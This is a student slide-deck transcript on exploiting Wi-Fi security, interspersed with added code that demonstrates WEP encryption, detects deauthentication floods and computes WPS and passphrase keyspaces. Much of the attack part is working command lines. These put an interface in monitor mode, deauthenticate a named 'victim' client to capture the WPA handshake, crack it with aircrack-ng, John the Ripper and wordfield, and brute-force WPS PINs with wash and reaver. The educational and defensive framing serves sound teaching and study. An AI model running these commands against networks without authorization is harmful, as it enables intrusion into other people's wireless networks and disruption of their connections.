Exploiting Wi-Fi Security
DESCRIPTION
These slides cover Wi-Fi security exploitation.
TRANSCRIPT
WPA EXPLOITATION IN THE WORLD OF WIRELESS NETWORK
By Hariraj Rathod, 8th sem
Department of Electronics and Communication
WIFI – WIRELESS FIDELITY
Wi-Fi is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves.
Wireless access allows users to connect to the internet from any location within range of a wireless access point.
SOME BASIC TERMS
A MAC address, or physical address, is a unique identifier assigned to a network interface for communication.
Access point >> Wireless router
SSID (service set identifier) >> Network Name
BSSID (basic service set identification ) >> MAC address of the access point
BASIC WORKING
When a user uses wireless internet they generate what are called data “packets”.
Packets are transmitted between the wireless card and the wireless access point via radio waves whenever the computer is connected with the access point.
BASIC WORKING CONTD.
Depending on how long the computer is connected, it can generate a certain number of packets per day.
The more users that are connected to one access point, the more packets are generated.
WIRELESS USES RADIO FREQUENCY
2.4 GHz Wi-Fi spectrum
WIRELESS ENCRYPTION
The main source of vulnerability in wireless networks is the method of encryption. The different types of wireless encryption are as follows:
WEP, WPA, WPA2
WEP
Stands for Wired Equivalent Privacy.
WEP is recognizable by its key of 10 or 26 hexadecimal digits.
WEP protocol was not developed by researchers or experts in security and cryptography.
Initial bytes of the key stream depended on just a few bits of the encryption key.
WEP CONTINUED
WEP Encryption Process
ICV: 32-bit integrity check value
IV: initialization vector
WEP CONTINUED
WEP Decryption Process
With multiple wireless clients sending a large amount of data, an attacker can remotely capture large amounts of WEP ciphertext and use cryptanalysis methods to determine the WEP key.
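The encryption and decryption process shown on the two WEP slides, carried through in code as an added example (this is not code from the original deck): RC4 is keyed with IV || WEP key, the plaintext is extended with a CRC-32 ICV, and the receiver recomputes the ICV after decrypting. The key, IV and message are constructed values, and `iv_exhaustion_seconds` is a hypothetical helper that makes the caveat a defender cares about concrete: the IV is only 24 bits, so a busy access point repeats keystreams within hours, which is one reason a large WEP capture is enough material for cryptanalysis.

```python
import zlib

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS          # only 16,777,216 distinct IVs per key


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key-scheduling (KSA) followed by the PRGA; returns `length` keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32 of the data (no key involved)."""
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Encryption slide: frame body = IV || RC4(IV||key) XOR (plaintext || ICV)."""
    if len(iv) != 3 or len(wep_key) not in (5, 13):   # 40-bit or 104-bit key (10 or 26 hex digits)
        raise ValueError("WEP needs a 3-byte IV and a 5- or 13-byte key")
    body = plaintext + icv(plaintext)
    keystream = rc4_keystream(iv + wep_key, len(body))
    return iv + bytes(a ^ b for a, b in zip(body, keystream))


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Decryption slide: regenerate the keystream from the cleartext IV, XOR, then verify the ICV.
    Returns the plaintext, or None when the ICV does not match (wrong key or altered frame)."""
    iv, body = frame[:3], frame[3:]
    keystream = rc4_keystream(iv + wep_key, len(body))
    plain = bytes(a ^ b for a, b in zip(body, keystream))
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


def iv_exhaustion_seconds(frames_per_second: float) -> float:
    """Seconds until every IV value has been used once at the given frame rate (hypothetical helper)."""
    return IV_SPACE / frames_per_second


# Constructed demo values: a 40-bit key written as 10 hex digits, as on the WEP slide.
DEMO_KEY = bytes.fromhex("0123456789")
DEMO_IV = b"\x00\x00\x01"

if __name__ == "__main__":
    frame = wep_encrypt(DEMO_KEY, DEMO_IV, b"hello wep")
    print("frame:", frame.hex())
    print("decrypted:", wep_decrypt(DEMO_KEY, frame))
    print("wrong key:", wep_decrypt(bytes.fromhex("ffffffffff"), frame))
    print("hours to exhaust the IV space at 500 frames/s:", iv_exhaustion_seconds(500) / 3600)
```

Note that the ICV is an unkeyed CRC-32, so it only detects accidental corruption; it is not a message authentication code.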
WPA OR WPA2
Stands for Wi-Fi Protected Access.
Created to provide stronger security
Still able to be cracked if a short password is used.
If a long passphrase or password is used, these protocols are practically uncrackable.
WPA-PSK with TKIP (Temporal Key Integrity Protocol) or AES (Advanced Encryption Standard) uses a Pre-Shared Key (PSK) that is more than 7 and less than 64 characters in length.
WPS (Wi-Fi Protected Setup) is a simple plug-and-play feature.
USING BACKTRACK >>
Some Basic Backtrack Terms >>
wlan1 – wireless interface
mon0 – monitor mode interface
Handshake – refers to the negotiation process between the computer and a WiFi server using WPA encryption. Needed to crack WPA/WPA2.
Dictionary – a list of common passwords.
.cap file – used to store captured packets.
MONITOR MODE
Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received from the wireless network.
Monitor mode allows packets to be captured without having to associate with an access point first.
TOOLS USED
Airmon-ng >> Places wireless cards in monitor mode.
Airodump-ng (Packet sniffer) >> Tool used to listen to wireless routers in the area.
Aireplay-ng (Packet injector) >> Aireplay-ng is used to inject frames. Its primary function is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys.
Aircrack-ng >> Cracks WEP and WPA (dictionary attack) keys.
TOOLS USED CONTINUED
Wordfield (Brute Force)
Reaver Tool (Brute Force)
AIRCRACK-NG
Selecting the interface to put it in monitor mode. Command used: airmon-ng start wlan1
AIRCRACK-NG CONTINUED
Start capturing packets: airodump-ng mon0
airodump-ng mon0 --channel 1 --bssid "mac id" -w reddot
AIRCRACK-NG CONTINUED
Deauthenticate the device connected to the access point and force it to re-exchange the WPA key.
aireplay-ng -0 4 -a F4:EC:38:BA:6C:44 -c 90:4C:E5:B2:6F:D8 mon0
where "-0 4" tells aireplay to inject deauthentication packets (4 of them), "-a" is the wireless access point MAC address and "-c" is the client (victim) MAC address.
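The deauthentication step above is also exactly what a wireless intrusion detection system watches for. The following is an added example (not part of the original slides) of that detection logic: a minimal 802.11 management-frame parser and a sliding-window counter that raises an alert when several deauthentication or disassociation frames for one BSSID arrive within a short window. The frames and MAC addresses are constructed inside the script; `DeauthFloodDetector`, `build_deauth` and the window/threshold values are my own choices, not any tool's API. On the mitigation side, 802.11w Protected Management Frames (PMF) authenticates these frames so that a forged deauthentication is dropped by the client instead of being honoured.

```python
import struct
from collections import defaultdict, deque

MGMT_TYPE = 0          # 802.11 frame type 0 = management
SUBTYPE_DISASSOC = 10  # management subtype 10 = disassociation
SUBTYPE_DEAUTH = 12    # management subtype 12 = deauthentication


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_80211_header(raw: bytes):
    """Minimal 802.11 MAC header parser. Returns None for non-management or truncated frames."""
    if len(raw) < 24:
        return None
    fc = raw[0]                       # frame control, first byte: version | type | subtype
    version = fc & 0x03
    ftype = (fc >> 2) & 0x03
    subtype = (fc >> 4) & 0x0F
    if version != 0 or ftype != MGMT_TYPE:
        return None
    frame = {
        "subtype": subtype,
        "addr1": mac_str(raw[4:10]),    # receiver / destination
        "addr2": mac_str(raw[10:16]),   # transmitter / source
        "bssid": mac_str(raw[16:22]),
        "reason": None,
    }
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(raw) >= 26:
        frame["reason"] = struct.unpack("<H", raw[24:26])[0]   # 2-byte reason code after the header
    return frame


class DeauthFloodDetector:
    """Alert when >= threshold deauth/disassoc frames for one BSSID arrive within window_seconds."""

    def __init__(self, window_seconds: float = 1.0, threshold: int = 3):
        self.window = window_seconds
        self.threshold = threshold
        self.recent = defaultdict(deque)   # bssid -> timestamps of recent deauth/disassoc frames
        self.alerts = []                   # (timestamp, bssid, count, last reason code)

    def feed(self, ts: float, raw: bytes):
        frame = parse_80211_header(raw)
        if not frame or frame["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            return None
        q = self.recent[frame["bssid"]]
        q.append(ts)
        while q and ts - q[0] > self.window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= self.threshold:
            alert = (ts, frame["bssid"], len(q), frame["reason"])
            self.alerts.append(alert)
            q.clear()                           # one alert per burst
            return alert
        return None


def build_deauth(addr1: str, addr2: str, bssid: str, reason: int) -> bytes:
    """Constructed test frame: FC 0xC0 (mgmt/deauth), duration, addr1-3, sequence control, reason."""
    to_b = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([0xC0, 0x00]) + b"\x00\x00" + to_b(addr1) + to_b(addr2) + to_b(bssid)
            + b"\x00\x00" + struct.pack("<H", reason))


# Constructed addresses (locally administered, not real devices).
AP = "02:00:00:00:00:01"
CLIENT = "02:00:00:00:00:02"

# Constructed capture: one ordinary deauth (reason 3 = sending station is leaving),
# then a burst of four frames with reason 7 (class 3 frame from non-associated station).
SAMPLE_CAPTURE = [
    (0.0, build_deauth(AP, CLIENT, AP, 3)),
    (10.0, build_deauth(CLIENT, AP, AP, 7)),
    (10.1, build_deauth(CLIENT, AP, AP, 7)),
    (10.2, build_deauth(CLIENT, AP, AP, 7)),
    (10.3, build_deauth(CLIENT, AP, AP, 7)),
]


def run_detector(capture=SAMPLE_CAPTURE, window_seconds=1.0, threshold=3):
    det = DeauthFloodDetector(window_seconds, threshold)
    for ts, raw in capture:
        det.feed(ts, raw)
    return det.alerts


if __name__ == "__main__":
    for ts, bssid, count, reason in run_detector():
        print(f"t={ts:.1f}s deauth flood on BSSID {bssid}: {count} frames in window, reason code {reason}")
```

A single deauthentication is normal when a client leaves, so the window and threshold are what separate noise from a flood; tune them against your own capture before alerting on them.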
AIRCRACK-NG CONTINUED
Authentication process in WPA
AIRCRACK-NG CONTINUED
4-way handshake is captured.
AIRCRACK-NG CONTINUED
Cracking the WPA key using aircrack-ng, the dictionary file and the captured 4-way handshake file reddot-01.cap:
aircrack-ng -w /home/pranav/download/password.lst -b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap
where "-w" specifies the dictionary file to use.
JOHN THE RIPPER
Faster than the previously used tool. Located at /pentest/password/john-1.7.6.jumbo12/run/
john --stdout --incremental=all | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/test-01.cap
WORD FIELD
Wordfield is a brute-force attack tool. Command line used: wordfield [OPTION...] MINLENGTH [MAXLENGTH]
"wordfield -a -n 8 8" will output all possible alphanumeric strings which are 8 characters long.
wordfield -a -n 8 8 | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/Wifire-02.cap
This attack is really effective on weak keys.
WORD FIELD CONTINUED
The run below took 22 hours, 7 minutes and 35 seconds.
DICTIONARY AND BRUTE FORCE LIMITATIONS
The passphrase cannot necessarily be found in the dictionary list, hence the method has its limitations.
Brute-force techniques require a lot of fast computational hardware.
Source: http://lastbit.com/pswcalc.asp
REAVER TOOL.
Reaver is a fantastic tool to crack the WPS PIN, written by Craig Heffner.
This tool exploits the WPS 8-digit PIN. One digit is a checksum digit, leaving 7 unknown digits, meaning there are 10^7 (10,000,000) possible combinations, which will take approximately 116 days to break at 1 attempt every second.
REAVER TOOL CONTINUED
WPS pin 65020920
REAVER TOOL CONTINUED
Finding a WPS victim: wash -i mon0
REAVER TOOL CONTINUED
CRACKING TECHNIQUE
The WPS PIN 6502-0920 is verified in two halves. The first half has 10^4 (10,000) combinations; the second half would also have 10^4, but since one of its digits is the checksum digit the combinations reduce to 10^3 (1,000). This reduces the time required to break the PIN to just over 3 hours, again assuming that 1 attempt is made every second.
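The arithmetic behind the dictionary/brute-force limitations slide and the two Reaver keyspace slides, as an added example that is not from the deck: a keyspace estimator for charset-based brute force, the 8-digit WPS PIN with and without two-half verification, and the checksum digit that makes the second half 10^3 instead of 10^4. The checksum formula is the public WPS one; the function names and the 1 attempt/second rate are assumptions taken from the slides' own figures. Running it over the slide's PIN 65020920 confirms that its last digit is the checksum of the first seven.

```python
def wps_checksum_digit(first_seven: int) -> int:
    """Checksum (8th) digit of a WPS PIN from its first seven digits: weighted digit sum mod 10."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True when an 8-digit PIN carries the correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum_digit(int(pin[:7])) == int(pin[7])


def wps_attempts(halves_verified_separately: bool) -> int:
    """Worst-case guesses for a WPS PIN.
    Whole PIN: 7 free digits -> 10^7. Halves: 10^4 for the first, 10^3 for the second (checksum fixed)."""
    if halves_verified_separately:
        return 10 ** 4 + 10 ** 3
    return 10 ** 7


def brute_force_keyspace(charset_size: int, length: int) -> int:
    """Number of candidate passphrases for a fixed length over a charset (e.g. 62 alphanumerics)."""
    return charset_size ** length


def exhaustion_seconds(keyspace: int, attempts_per_second: float) -> float:
    """Seconds to try every candidate at a given rate (expected time to success is about half)."""
    return keyspace / attempts_per_second


def describe(seconds: float) -> str:
    if seconds < 3600:
        return f"{seconds / 60:.1f} minutes"
    if seconds < 86400 * 2:
        return f"{seconds / 3600:.2f} hours"
    if seconds < 86400 * 365 * 2:
        return f"{seconds / 86400:.1f} days"
    return f"{seconds / (86400 * 365):.3g} years"


if __name__ == "__main__":
    # Rate assumed from the slides: one WPS attempt per second.
    print("WPS, whole PIN:   ", describe(exhaustion_seconds(wps_attempts(False), 1)))
    print("WPS, split halves:", describe(exhaustion_seconds(wps_attempts(True), 1)))
    print("PIN 65020920 has a valid checksum:", is_valid_wps_pin("65020920"))
    # Constructed rate for passphrase guessing, to show why length matters more than charset.
    rate = 5000
    for charset, length in ((62, 8), (26, 12), (26, 20)):
        space = brute_force_keyspace(charset, length)
        print(f"charset {charset}, length {length}: {describe(exhaustion_seconds(space, rate))}")
```

The WPS numbers reproduce the slides' 116 days versus just over 3 hours; the passphrase rows show that at any fixed rate the exponent (length) dominates, which is the basis for the earlier claim that a long WPA passphrase is practically uncrackable by brute force.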
REAVER TOOL CONTINUED
reaver -i mon0 -b F4:EC:38:BA:6C:44
REAVER TOOL CONTINUED
BE SECURED
THANKS : )